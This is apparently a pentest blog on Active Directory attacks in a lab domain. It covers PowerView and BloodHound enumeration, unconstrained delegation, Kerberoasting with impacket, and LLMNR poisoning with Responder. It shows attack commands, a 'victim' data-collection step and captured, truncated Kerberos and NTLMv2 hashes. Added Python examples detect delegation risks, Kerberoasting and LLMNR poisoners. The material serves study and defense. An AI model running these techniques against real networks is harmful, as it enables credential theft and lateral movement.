0xk4k45h1
Copyright © 2024 | Yankos
Active Directory
Domain Enumeration
Here we are going to cover some enumeration and credential dumping techniques.

PowerView

PowerView is a powerful PowerShell script that can be used for enumerating a domain after you have already gained a shell on a system (post-exploitation).

Installation

You can download it from here. Send it to the victim.

Usage

powershell -ep bypass : bypasses the execution policy so PowerShell scripts can be run more freely (the policy only exists to stop us from executing scripts by accident, so we can turn it off with this command).

. .\PowerView.ps1 : loads PowerView into the current session.

Now we are able to do some enumeration:

PS C:\Users\Administrator\Desktop> Get-NetDomain

Forest                  : rift.local
DomainControllers       : {NINJA-DC.rift.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : NINJA-DC.rift.local
RidRoleOwner            : NINJA-DC.rift.local
InfrastructureRoleOwner : NINJA-DC.rift.local
Name                    : rift.local

Users enumeration

PS C:\Users\Administrator\Desktop> Get-NetUser | select cn

cn
--
Administrator
Guest
DefaultAccount
Eng
krbtgt
kayn
jax
zed
SQL Service
abdo
kandil
ahmed
sphinky
7aidor

Group enumeration

PS C:\Users\Administrator\Desktop> Get-NetGroup -name *admin* | select cn

cn
--
Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins

Shares enumeration

PS C:\Users\Administrator\Desktop> Invoke-ShareFinder

Name     Type       Remark             ComputerName
----     ----       ------             ------------
ADMIN$   2147483648 Remote Admin       NINJA-DC.rift.local
C$       2147483648 Default share      NINJA-DC.rift.local
hackme   0                             NINJA-DC.rift.local
IPC$     2147483651 Remote IPC         NINJA-DC.rift.local
NETLOGON 0          Logon server share NINJA-DC.rift.local
SYSVOL   0          Logon server share NINJA-DC.rift.local

OS enumeration of the computers in the domain

PS C:\Users\Administrator\Desktop> Get-NetComputer | select operatingsystem

operatingsystem
---------------
Windows Server 2016 Datacenter
Windows 10 Enterprise LTSC

Use Get-NetComputer -fulldata | select operatingsystem if the previous command didn't work.

This is a brief intro to installing and using PowerView (of course you can use it for many more enumerations).

BloodHound

BloodHound uses graph theory to represent the relationships between the components within Active Directory. It visualizes the gathered data so that complex paths within Active Directory can be identified.

There are actually three main parts: Neo4j, SharpHound and BloodHound.

Neo4j: a native graph database that implements a true graph model all the way down to the storage level.
SharpHound: the collector that actually gathers the data.
BloodHound: the interface used for visualizing the data collected by SharpHound.

Installation

apt-get install bloodhound : installs BloodHound on your attacking machine.
neo4j console : starts the Neo4j console. The default credentials are neo4j:neo4j; you will be asked to change the password and then use the new credentials for the following logins.

You can download SharpHound from here. Send it to the victim.

Usage

On the target, bypass the execution policy as we did for PowerView:

powershell -ep bypass
. .\SharpHound.ps1 : loads SharpHound.
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

This results in a zip file called loot.zip that contains the collected data. Send that zip file to the attacking machine, open BloodHound on the attacking machine using bloodhound, and drag the zip file into BloodHound. Now you can use the ready-made queries or create a custom query to be visualized.

This is an example of visualizing the "Find all Domain Admins" query.
Active Directory
· 2024-07-16
Kerberos Delegation
Delegation means allowing one party (A) to perform a specific task on behalf of another party (B) using the privileges of B.

Kerberos Unconstrained Delegation

Unconstrained delegation allows the first-hop server (a web server, for example) to request access to any service on any computer in the domain.

Before we go on, consider this situation. You have an application server (which has unconstrained delegation) and you as a user can access it. There is also server B, which cannot be accessed by the user directly (the user has the privileges to access it, but not through a direct interface), while the app server can access server B through an interface between them. So if you want to access server B you need to make use of the unconstrained delegation on the application server (front end) to make it forward your request, with your privileges, to server B (back-end server).

In this image we can see the operation:

In steps 1 and 2 the user requests a TGT for authentication, as we already know.
In steps 3 and 4 the user requests a TGS to access the app server (this is the point of unconstrained delegation): this TGS will also contain a forwardable TGT of the user.
The server can then use the TGT embedded in the TGS to request a TGS for server B, for example, and it will get a valid TGS to access server B because it is based on the user's privileges.

Attack

The attack involves determining which components have unconstrained delegation, then dumping the tickets they save, which may let us impersonate the owners of those tickets.
Active Directory
· 2024-07-15
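An added example that is not from the original post: the defender's counterpart to the "which components have unconstrained delegation" step above, an audit of delegation settings read from the userAccountControl flags. The records, account names and the allowedTo field (standing in for msDS-AllowedToDelegateTo) are constructed; only the flag values are the real Active Directory constants.

```python
# Real userAccountControl bit values from Active Directory.
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"

def delegation_kind(uac, allowed_to):
    """Classify one account as 'unconstrained', 'constrained' or 'none'."""
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if allowed_to or uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained"
    return "none"

def audit(records):
    """Findings per account. Unconstrained delegation on anything but a DC is
    the risky case the post describes: that host caches a forwardable TGT of
    every user that authenticates to it."""
    findings = []
    for r in records:
        kind = delegation_kind(r["uac"], r.get("allowedTo", []))
        is_dc = bool(r["uac"] & SERVER_TRUST_ACCOUNT)
        if kind == "unconstrained" and not is_dc:
            findings.append((r["name"], "unconstrained on non-DC: move to constrained or resource-based delegation"))
        elif kind == "constrained":
            findings.append((r["name"], "constrained to " + ", ".join(r.get("allowedTo", []))))
    return findings

def unprotected_admins(records, admins):
    """Privileged accounts without NOT_DELEGATED (or Protected Users membership)
    are the ones whose cached TGTs would be worth anything on such a host."""
    return [r["name"] for r in records
            if r["name"] in admins and not (r["uac"] & NOT_DELEGATED)]

# Constructed sample records modelled on the post's rift.local lab (not real data).
SAMPLE = [
    {"name": "NINJA-DC$", "uac": 0x82000},        # DC: unconstrained is expected here
    {"name": "APPSRV01$", "uac": 0x81000},        # member server with unconstrained delegation
    {"name": "WEB01$", "uac": 0x1001000, "allowedTo": ["MSSQLSvc/sql01.rift.local"]},
    {"name": "Administrator", "uac": 0x200},      # no NOT_DELEGATED flag set
    {"name": "svc_backup", "uac": 0x100200},      # NOT_DELEGATED set
]
```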
Kerberoast
Kerberoast

This attack is a form of lateral movement in Active Directory. Once you get any credentials in the domain, do Kerberoasting!

But who is the target now? It is performed against any service account, exploiting the TGS creation mechanism.

TGS: Ticket Granting Service. This ticket is sent to the user who wants to access a specific service once this user provides the TGT. The TGS is encrypted using the hash of the service account, so you can try cracking it offline to get the password of the service.

Note: if there is a port number in the SPN, make sure that you remove it from the hash you get.

We use GetUserSPNs.py from impacket.

Example usage

┌──(youssif㉿youssif)-[/usr/share/doc/python3-impacket/examples]
└─$ python ./GetUserSPNs.py -dc-ip 192.168.2.129 rift.local/abdo:abdo123 -request
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
ServicePrincipalName                 Name        MemberOf  PasswordLastSet             LastLogon  Delegation
------------------------------------ ----------  --------  --------------------------  ---------  ----------
NINJA-DC/SQLService.rift.local:60001 SQLService            2024-02-16 10:27:07.970505  <never>

[-] CCache file is not found. Skipping...
$krb5tgs$23$*SQLService$RIFT.LOCAL$rift.local/SQLService*$8953860704b1ee9e903ebfd13994127a$…

Mitigation

Mitigation is simple:
Use strong passwords (hard to crack).
Make sure the service accounts have the least privileges (not an admin, for example).
Active Directory
· 2024-06-21
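An added example, not part of the original post, showing the detection side: the $krb5tgs$23$ prefix above means the ticket was issued with RC4-HMAC (etype 23, shown as 0x17 in Windows Security event 4769), so RC4 service-ticket requests for user service accounts are the usual indicator alongside the mitigations listed. The log lines and their key=value rendering are constructed; real 4769 events need a different parser, and the HTTPService account does not exist in the post's lab.

```python
import re
from collections import defaultdict

RC4_HMAC = 0x17          # "Ticket Encryption Type" value for etype 23 (RC4)
FIELD = re.compile(r"(\w+)=(\S+)")

def parse_4769(line):
    """Parse one constructed 'key=value' rendering of a 4769 event into a dict."""
    ev = dict(FIELD.findall(line))
    ev["etype"] = int(ev["etype"], 16)
    return ev

def is_roastable_target(service):
    """Only user service accounts matter: krbtgt and machine accounts (name$)
    have long random passwords and are not what GetUserSPNs.py requests."""
    return service.lower() != "krbtgt" and not service.endswith("$")

def detect_kerberoast(lines, min_services=1):
    """Return {client_ip: sorted services} for clients that obtained RC4
    tickets for at least min_services distinct user service accounts.
    Raise min_services in domains where some legacy RC4 traffic is normal."""
    rc4_by_client = defaultdict(set)
    for line in lines:
        ev = parse_4769(line)
        if ev["id"] != "4769" or ev["status"] != "0x0":
            continue                      # only successful ticket issuance
        if ev["etype"] == RC4_HMAC and is_roastable_target(ev["service"]):
            rc4_by_client[ev["client"]].add(ev["service"])
    return {c: sorted(s) for c, s in rc4_by_client.items() if len(s) >= min_services}

# Constructed sample events modelled on the post's rift.local lab (not real logs).
SAMPLE_LOG = [
    "id=4769 account=abdo@RIFT.LOCAL service=NINJA-DC$ etype=0x12 status=0x0 client=192.168.2.50",
    "id=4769 account=abdo@RIFT.LOCAL service=SQLService etype=0x17 status=0x0 client=192.168.2.50",
    "id=4769 account=abdo@RIFT.LOCAL service=HTTPService etype=0x17 status=0x0 client=192.168.2.50",
    "id=4769 account=jax@RIFT.LOCAL service=krbtgt etype=0x17 status=0x0 client=192.168.2.51",
    "id=4769 account=jax@RIFT.LOCAL service=SQLService etype=0x12 status=0x0 client=192.168.2.51",
]
```

A client that pulls RC4 tickets for every SPN in the domain within seconds, as the -request run above does, is the pattern to alert on; AES-only service accounts with long passwords remove most of the signal the cracker depends on.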
SMB relay
Active Directory
· 2024-02-17
LLMNR Poisoning
What is LLMNR?

The Link-Local Multicast Name Resolution (LLMNR) protocol is based on the Domain Name System (DNS) packet format and allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link. The flaw arises because the user's name and NTLMv2 hash are sent when responding.

LLMNR Poisoning

When trying to access an SMB share, for example, the computer takes the following steps:

Check the local cache for the record; if no record exists,
Send a DNS query to the DNS server. The problem occurs here if the DNS server couldn't find it, because
The computer (victim) then sends an LLMNR query as a broadcast, and
The responder (man in the middle) will get the name and the NTLMv2 hash of the victim when it answers.

As an attacker you can try cracking the NTLMv2 hash using a tool like hashcat.

LLMNR poisoning is an attack where a malicious actor listens for LLMNR requests and responds with their own IP address (or another IP of their choosing) to redirect the traffic.

In our discussion we will use a tool called Responder to perform the role of the MITM, which will get the name and hash and respond to the victim.

┌──(youssif㉿youssif)-[~]
└─$ sudo responder -I eth0
[sudo] password for youssif:
sudo: a password is required

┌──(youssif㉿youssif)-[~]
└─$ sudo responder -I eth0
[sudo] password for youssif:
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.126.135]
    Responder IPv6             [fe80::9857:69cd:4087:1b54]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-NSDPQOYEW3Q]
    Responder Domain Name      [HK3L.LOCAL]
    Responder DCE-RPC Port     [49090]

[+] Listening for events...

Now Responder is set. Let's go to the victim and try accessing the Responder IP from the victim machine, as shown below.

When we look again at Responder we will find this:

[SMB] NTLMv2-SSP Client   : 192.168.126.151
[SMB] NTLMv2-SSP Username : RIFT\jax
[SMB] NTLMv2-SSP Hash     : jax::RIFT:98bf26eff5a881f…

As an attacker, you got the NTLMv2 hash and you can try cracking it. You can also use the hash without cracking it in other attacks.
Active Directory
· 2024-02-17
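An added example, not from the original post: because LLMNR reuses the DNS wire format, a short parser is enough to build a canary detector, the defender's counterpart of the Responder session above. The sensor queries a name no host on the link legitimately owns; anything that answers it is answering every name. All packets, hostnames and IPs below are constructed (the suspect IP reuses the Responder IP shown in the session).

```python
import struct

def parse_llmnr(payload):
    """Return (transaction id, is_response, queried name) from an LLMNR packet.
    Header is the 12-byte DNS header; QR is the top bit of the flags word."""
    tid, flags, qdcount = struct.unpack("!HHH", payload[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, pos = [], 12                 # question section starts after the header
    while True:
        length = payload[pos]
        pos += 1
        if length == 0:
            break
        labels.append(payload[pos:pos + length].decode("ascii"))
        pos += length
    return tid, bool(flags & 0x8000), ".".join(labels)

def build_query(tid, name):
    """Constructed LLMNR query for name (type A, class IN), used as the canary."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", tid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def find_poisoners(canary, packets):
    """packets: iterable of (src_ip, payload) seen on UDP 5355. Any response whose
    question matches the canary name comes from a host answering names it cannot own."""
    suspects = set()
    for src, payload in packets:
        _tid, is_resp, name = parse_llmnr(payload)
        if is_resp and name.lower() == canary.lower():
            suspects.add(src)
    return sorted(suspects)

# Constructed traffic: our canary query, a normal query from another host, and a
# spoofed A-record answer to the canary from 192.168.126.135 (an answer section
# with a compression pointer to the question name and a 4-byte address).
CANARY = "nonexistent-share-7f3a"
TRAFFIC = [
    ("192.168.126.10", build_query(0x1234, CANARY)),
    ("192.168.126.151", build_query(0x0042, "fileserver")),
    ("192.168.126.135", struct.pack("!HHHHHH", 0x1234, 0x8000, 1, 1, 0, 0)
        + b"\x16nonexistent-share-7f3a\x00" + struct.pack("!HH", 1, 1)
        + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + bytes([192, 168, 126, 135])),
]
```

The durable fix is to disable LLMNR (and NBT-NS) by group policy so the victim never falls through to the multicast query; the canary only tells you a poisoner is present.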